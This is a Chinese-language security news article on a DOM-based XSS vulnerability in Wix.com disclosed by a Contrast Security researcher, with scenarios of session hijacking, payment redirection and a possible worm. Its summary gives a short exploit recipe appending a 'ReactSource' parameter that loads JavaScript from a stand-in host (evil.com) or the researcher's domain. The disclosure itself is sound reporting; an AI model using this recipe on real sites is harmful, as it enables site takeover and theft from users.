导语:Web主机云服务提供商Wix.com存在Dom型XSS漏洞,攻击者可控制在该平台上托管的任何一个网站,数百万托管在Wix.com上的网站可能面临安全风险。

Web主机云服务提供商Wix.com存在Dom型XSS漏洞,该漏洞可以让攻击者控制在该平台上托管的任何一个网站,数百万托管在Wix.com上的网站可能面临安全风险。

该漏洞由Contrast Security的高级安全研究员Matt Austin得以证实。据OWASP报告表示,基于DOM的XSS攻击(或者在一些情况下称为“type-0 XSS”)是XSS攻击的其中一种形式,但是此漏洞不同于传统的XSS漏洞(payload存储于一个HTTP(S)请求的响应页面中),DOM型XSS漏洞通过客户端脚本修改用户浏览器中文档对象模型(DOM)环境,并且恶意代码会影响客户端代码的执行。也就是说,页面本身(HTTP响应)没有变化,但是客户端代码页中包含不同的执行命令,因为DOM环境已经被恶意修改。

基于DOM的XSS与XSS攻击是有所区别的。XSS攻击是攻击者将自己的脚本代码注入到有Web应用程序生成的网页中,当有用户浏览该网页时,攻击者的脚本可以被解释执行,从而达到攻击的目的;基于DOM的XSS攻击主要存在于页面中客户端本身。

以下内容主要摘录自Austin的博客文章:

Wix.com有一个严重的DOM XSS漏洞,允许攻击者针对托管在Wix.com上的任何网站实施攻击。只需要在Wix上创建的网站上添加单个参数,攻击者可以让他们的恶意JavaScript代码在该网站上加载执行。

TL;DR:(篇幅过长,概括如下)

1. 在wix.com网站上的任何站点的任何URL上添加“?ReactSource=http://evil.com”
2. 确保evil.com在/packages-bin/wixCodeInit/wixCodeInit.min.jshost一个恶意文件

这里有一个正在发生的漏洞案例,导致了一个反映负载出现:

Austin表示,尽管早在十月份的时候就已经把漏洞信息向Wix通报,但是截止到本周三这个漏洞仍然没有被修复。Wix.com也没有对这个报告发表过任何回复。据Wix.com官方统计,在该平台共计8600万用户。

漏洞场景分析

Austin分析了2种反射DOM型XSS漏洞的攻击场景。其中一种是诱导Wix网站所有者点击一个恶意的URL链接。这个URL会加载一个精心构造的JavaScript代码劫持受害者浏览器的session信息。

随后攻击者可以侵占受害者的浏览器session,这样他就可以像原来的用户那样,执行任意的操作了。攻击者可以对受害者原先掌控着的Wix网站进行修改,例如向第三方提供网站管理员的权利,或渗透一个Wix电子商务站点来窃取信用卡号码。

Austin说,拥有Wix.com站点的管理员控制权限后,就能分发恶意软件,创建一个动态的、分布式的、基于浏览器的僵尸网络,窃取网络货币,并控制网站的内容和使用它的用户。

在Austin描述的第二个场景中,可以运用一个精心构造的URL,将用户诱导进入一个Wix网站。该URL通过一个DOM型的XSS攻击,将JavaScript加载到目标的Wix.com网站中。在某种情境中,通过浏览器的session信息,可以对一个Wix.com的粉丝网站进行修改,从而将音乐下载替换为恶意软件下载,或者将PayPal支付重新定向到第三方帐户。

在DOM XSS攻击的案例中,攻击者需要做的就是在服务器上布置恶意的JavaScript,并用一个URL指向它。例如:“http://matt4592.wixsite.com/music?ReactSource=http://m-austin.com“。在这个例子中,根域名”http://matt4592.wixsite.com/music”后面嵌入了附加的“?ReactSource=http://m-austin.com”, 这为基于DOM的XSS攻击提供有效载荷创造了条件。

Contrast Security表示,更糟糕的是,利用这种缺陷,网络罪犯可以对攻击进行扩张,把它变成一个蠕虫,从而在所有的Wix网站中传播,这将类似于2005年时臭名昭著的Samy蠕虫和MySpace蠕虫——被设计用来针对整个社交网站。

Austin说,前车之鉴告诉我们,想要接管托管在Wix的数以百万计的网站,其实并不需要花太长的时间。

源链接

Hacking more

...